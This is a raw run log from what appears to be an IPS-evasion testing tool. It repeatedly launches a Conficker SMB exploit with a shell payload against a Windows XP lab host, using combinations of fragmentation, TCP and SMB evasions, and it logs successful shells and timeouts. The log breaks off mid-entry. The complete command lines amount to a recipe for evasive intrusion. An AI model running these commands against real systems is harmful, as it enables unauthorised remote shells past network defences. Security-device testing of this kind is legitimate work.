- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24870 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=LEWXIa/Bd2k --evasion=[start,msrpc_bind]ipv4_frag,"56" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed LEWXIa/Bd2k
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments are sent in correct order except that the first fragment comes last
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.113:24870 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 7540 runs averaging 1.94 runs / second ; progress: 3892/43200.........
- 7549 runs averaging 1.94 runs / second ; progress: 3897/43200..........
- 7559 runs averaging 1.94 runs / second ; progress: 3902/43200..Pid 25915 timed out - killed
- 2015-06-08 00:24:34 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31672 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=R7NIX+Io+yg --evasion=[start,smb_openpipe]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed R7NIX+Io+yh
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.115:31672 -> 10.35.1.207:445
- Terminated
- .........
- 7571 runs averaging 1.94 runs / second ; progress: 3907/43200........Pid 26040 timed out - killed
- 2015-06-08 00:24:39 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42437 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5+99742Gcsk --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --evasion=[netbios_connect,smb_connect]tcp_seg,"10" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 5+99742Gcsn
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP packets are segmented to contain at most 10 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:42437 -> 10.35.1.207:445
- Terminated
- ............
- 7592 runs averaging 1.94 runs / second ; progress: 3912/43200......2015-06-08 00:24:45 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62963 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=rk+a46qwtk4 --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_connect,end]tcp_paws,"25%","119368059","random" --verifydelay=1000 --payload=shell
- Info: Using random seed rk+a46qwtk6
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 119368059> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * EBCDIC character encoding
- * IBM floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.117:62963 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 7600 runs averaging 1.94 runs / second ; progress: 3917/43200......
- 7606 runs averaging 1.94 runs / second ; progress: 3922/43200........
- 7614 runs averaging 1.94 runs / second ; progress: 3927/43200.............
- 7627 runs averaging 1.94 runs / second ; progress: 3932/43200...........
- 7638 runs averaging 1.94 runs / second ; progress: 3937/43200............
- 7650 runs averaging 1.94 runs / second ; progress: 3942/43200...........
- 7661 runs averaging 1.94 runs / second ; progress: 3947/43200........
- 7669 runs averaging 1.94 runs / second ; progress: 3952/43200..
- 7671 runs averaging 1.94 runs / second ; progress: 3957/43200.........
- 7680 runs averaging 1.94 runs / second ; progress: 3962/43200................
- 7696 runs averaging 1.94 runs / second ; progress: 3967/43200..........2015-06-08 00:25:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59021 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Z0Kg5SOkUyY --evasion=[smb_connect,end]ipv4_frag,"48" --evasion=[smb_opentree,end]tcp_paws,"5","98447718","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Z0Kg5SOkUyZ
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 98447718> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:59021 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 7710 runs averaging 1.94 runs / second ; progress: 3972/43200
- 7710 runs averaging 1.94 runs / second ; progress: 3977/43200Pid 27451 timed out - killed
- 2015-06-08 00:25:50 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31480 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=XOBw9+XbinQ --evasion=[smb_connect,end]netbios_chaff,"3","empty_unspec|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed XOBw9+XbinR
- The following evasions are applied from stage smb_connect to end:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:31480 -> 10.35.1.207:445
- Terminated
- .
- 7712 runs averaging 1.94 runs / second ; progress: 3982/43200.........
- 7721 runs averaging 1.94 runs / second ; progress: 3988/43200..........
- 7731 runs averaging 1.94 runs / second ; progress: 3993/43200.....
- 7736 runs averaging 1.94 runs / second ; progress: 3998/43200............
- 7748 runs averaging 1.94 runs / second ; progress: 4003/43200....................
- 7768 runs averaging 1.94 runs / second ; progress: 4008/43200.............
- 7781 runs averaging 1.94 runs / second ; progress: 4013/43200.......
- 7788 runs averaging 1.94 runs / second ; progress: 4018/43200..........
- 7798 runs averaging 1.94 runs / second ; progress: 4023/43200...................2015-06-08 00:26:37 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35633 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=uj13gaG/tWg --evasion=[start,msrpc_bind]tcp_paws,"21","10082354","shuffle" --evasion=[start,end]tcp_paws,"25%","268435455","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed uj13gaG/tWi
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage start to msrpc_bind:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10082354> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.117:35633 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 7820 runs averaging 1.94 runs / second ; progress: 4028/43200....2015-06-08 00:26:39 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59405 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kJsTKME6sVk --evasion=[netbios_connect,smb_opentree]tcp_overlap,"1479","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","7","alphanumrandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed kJsTKME6sVm
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.112:59405 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 7831 runs averaging 1.94 runs / second ; progress: 4033/432002015-06-08 00:26:43 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18078 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=de5xLhxtOOU --evasion=[smb_openpipe,end]smb_decoytrees,"4","3","1","random_msrpcbind" --evasion=[msrpc_bind,end]smb_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed de5xLhxtOOV
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
- The following evasions are applied from stage msrpc_bind to end:
- - SMB writes are segmented to contain at most 7 bytes of payload.
- Info: NetBIOS connection 10.62.90.119:18078 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 7838 runs averaging 1.94 runs / second ; progress: 4038/43200.....
- 7843 runs averaging 1.94 runs / second ; progress: 4043/43200.2015-06-08 00:26:53 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40870 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SXLFlo5iPRg --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"1","3","5","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed SXLFlo5iPRh
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 5 random alphanumeric bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.117:40870 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 7856 runs averaging 1.94 runs / second ; progress: 4048/43200...............2015-06-08 00:27:03 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34053 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Gnk5u9SA84k --evasion=[msrpc_bind,end]smb_decoytrees,"5","5","3","random_msrpcreq" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","171738880","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed Gnk5u9SA84k
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:34053 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7872 runs averaging 1.94 runs / second ; progress: 4053/43200.......
- 7879 runs averaging 1.94 runs / second ; progress: 4058/43200.......
- 7886 runs averaging 1.94 runs / second ; progress: 4063/43200.....2015-06-08 00:27:17 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23024 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=QyM7Ixajmbw --evasion=[smb_connect,smb_opentree]smb_chaff,"75%","write_flag","zero" --evasion=[msrpc_bind,end]tcp_paws,"25%","33949496","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed QyM7Ixajmbx
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33949496> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.119:23024 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7892 runs averaging 1.94 runs / second ; progress: 4068/43200.....
- 7897 runs averaging 1.94 runs / second ; progress: 4073/43200....
- 7901 runs averaging 1.94 runs / second ; progress: 4078/43200....
- 7905 runs averaging 1.94 runs / second ; progress: 4083/43200
- 7905 runs averaging 1.93 runs / second ; progress: 4088/43200..
- 7907 runs averaging 1.93 runs / second ; progress: 4093/43200....
- 7911 runs averaging 1.93 runs / second ; progress: 4098/43200.....
- 7916 runs averaging 1.93 runs / second ; progress: 4103/43200........
- 7924 runs averaging 1.93 runs / second ; progress: 4108/43200Pid 30195 timed out - killed
- 2015-06-08 00:27:59 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28186 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=n/6DiCvgfXw --evasion=[smb_connect,msrpc_req]ipv4_frag,"80" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed n/6DiCvgfXy
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - IPv4 fragments with at most 80 bytes per fragment
- Info: NetBIOS connection 10.62.90.111:28186 -> 10.35.1.207:445
- Terminated
- .........
- 7934 runs averaging 1.93 runs / second ; progress: 4113/43200.......Pid 30292 timed out - killed
- 2015-06-08 00:28:06 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49892 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Z7tH6rtzJ0E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"75%","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"9","new","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Z7tH6rtzJ0F
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 9 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.118:49892 -> 10.35.1.207:445
- Terminated
- .....
- 7947 runs averaging 1.93 runs / second ; progress: 4118/43200.............
- 7960 runs averaging 1.93 runs / second ; progress: 4123/43200........Pid 30548 timed out - killed
- 2015-06-08 00:28:16 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40982 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4MS2bDmeUFo --evasion=[msrpc_req,end]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 4MS2bDmeUFr
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - IPv4 fragments with at most 40 bytes per fragment
- Info: NetBIOS connection 10.62.90.114:40982 -> 10.35.1.207:445
- Terminated
- .........
- 7978 runs averaging 1.93 runs / second ; progress: 4128/43200...................
- 7997 runs averaging 1.93 runs / second ; progress: 4133/43200............................
- 8025 runs averaging 1.94 runs / second ; progress: 4138/43200..............
- 8039 runs averaging 1.94 runs / second ; progress: 4143/43200....
- 8043 runs averaging 1.94 runs / second ; progress: 4148/43200........
- 8051 runs averaging 1.94 runs / second ; progress: 4153/43200...............
- 8066 runs averaging 1.94 runs / second ; progress: 4158/43200............
- 8078 runs averaging 1.94 runs / second ; progress: 4163/43200..............
- 8092 runs averaging 1.94 runs / second ; progress: 4168/43200...............
- 8107 runs averaging 1.94 runs / second ; progress: 4173/43200..........
- 8117 runs averaging 1.94 runs / second ; progress: 4178/43200.........
- 8126 runs averaging 1.94 runs / second ; progress: 4183/43200............
- 8138 runs averaging 1.94 runs / second ; progress: 4188/43200..........
- 8148 runs averaging 1.94 runs / second ; progress: 4193/43200....
- 8152 runs averaging 1.94 runs / second ; progress: 4198/43200..Pid 31832 timed out - killed
- 2015-06-08 00:29:31 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=uLFl/pvqX9E --evasion=[msrpc_req,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,smb_openpipe]tcp_paws,"75%","268435455","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed uLFl/pvqX9G
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.113:57268 -> 10.35.1.207:445
- Terminated
- ..
- 8157 runs averaging 1.94 runs / second ; progress: 4203/43200........
- 8165 runs averaging 1.94 runs / second ; progress: 4208/43200..............
- 8179 runs averaging 1.94 runs / second ; progress: 4213/43200....Pid 32234 timed out - killed
- 2015-06-08 00:29:45 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25299 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=aed0q+Kl1ig --evasion=[start,end]tcp_inittsopt,"enable","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed aed0q+Kl1ih
- - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
- The following evasions are applied from stage smb_opentree to end:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.116:25299 -> 10.35.1.207:445
- Terminated
- .....2015-06-08 00:29:47 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47685 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=y67+vnvZhII --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed y67+vnvZhIL
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.118:47685 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 8196 runs averaging 1.94 runs / second ; progress: 4218/43200...................
- 8215 runs averaging 1.95 runs / second ; progress: 4223/43200...............
- 8230 runs averaging 1.95 runs / second ; progress: 4228/43200.......2015-06-08 00:30:02 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10344 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=36UEqLYSE18 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","9","random_alpha" --evasion=[msrpc_bind,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 36UEqLYSE1/
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:10344 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 2015-06-08 00:30:02 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50948 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=aHMCcAh1EZg --evasion=[smb_connect,smb_openpipe]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed aHMCcAh1EZh
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.114:50948 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8241 runs averaging 1.95 runs / second ; progress: 4234/43200.2015-06-08 00:30:04 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58105 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TJu3ax2/y1E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"50%","inc","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"1","2","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed TJu3ax2/y1F
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.114:58105 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .2015-06-08 00:30:07 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51356 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=FeVeSaOFJ/M --evasion=[smb_connect,msrpc_bind]ipv4_opt,"13","inc","random_alpha" --evasion=[netbios_connect,end]tcp_paws,"75%","5","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed FeVeSaOFJ/M
- The following evasions are applied from stage netbios_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has shuffled original payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- Info: NetBIOS connection 10.62.90.114:51356 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 8246 runs averaging 1.95 runs / second ; progress: 4239/43200............
- 8258 runs averaging 1.95 runs / second ; progress: 4244/43200......
- 8264 runs averaging 1.95 runs / second ; progress: 4249/43200..........
- 8274 runs averaging 1.95 runs / second ; progress: 4254/43200..
- 8276 runs averaging 1.94 runs / second ; progress: 4259/43200........
- 8284 runs averaging 1.94 runs / second ; progress: 4264/43200.......
- 8291 runs averaging 1.94 runs / second ; progress: 4269/43200.......2015-06-08 00:30:42 INFO
- Success. (10.62.90.116):
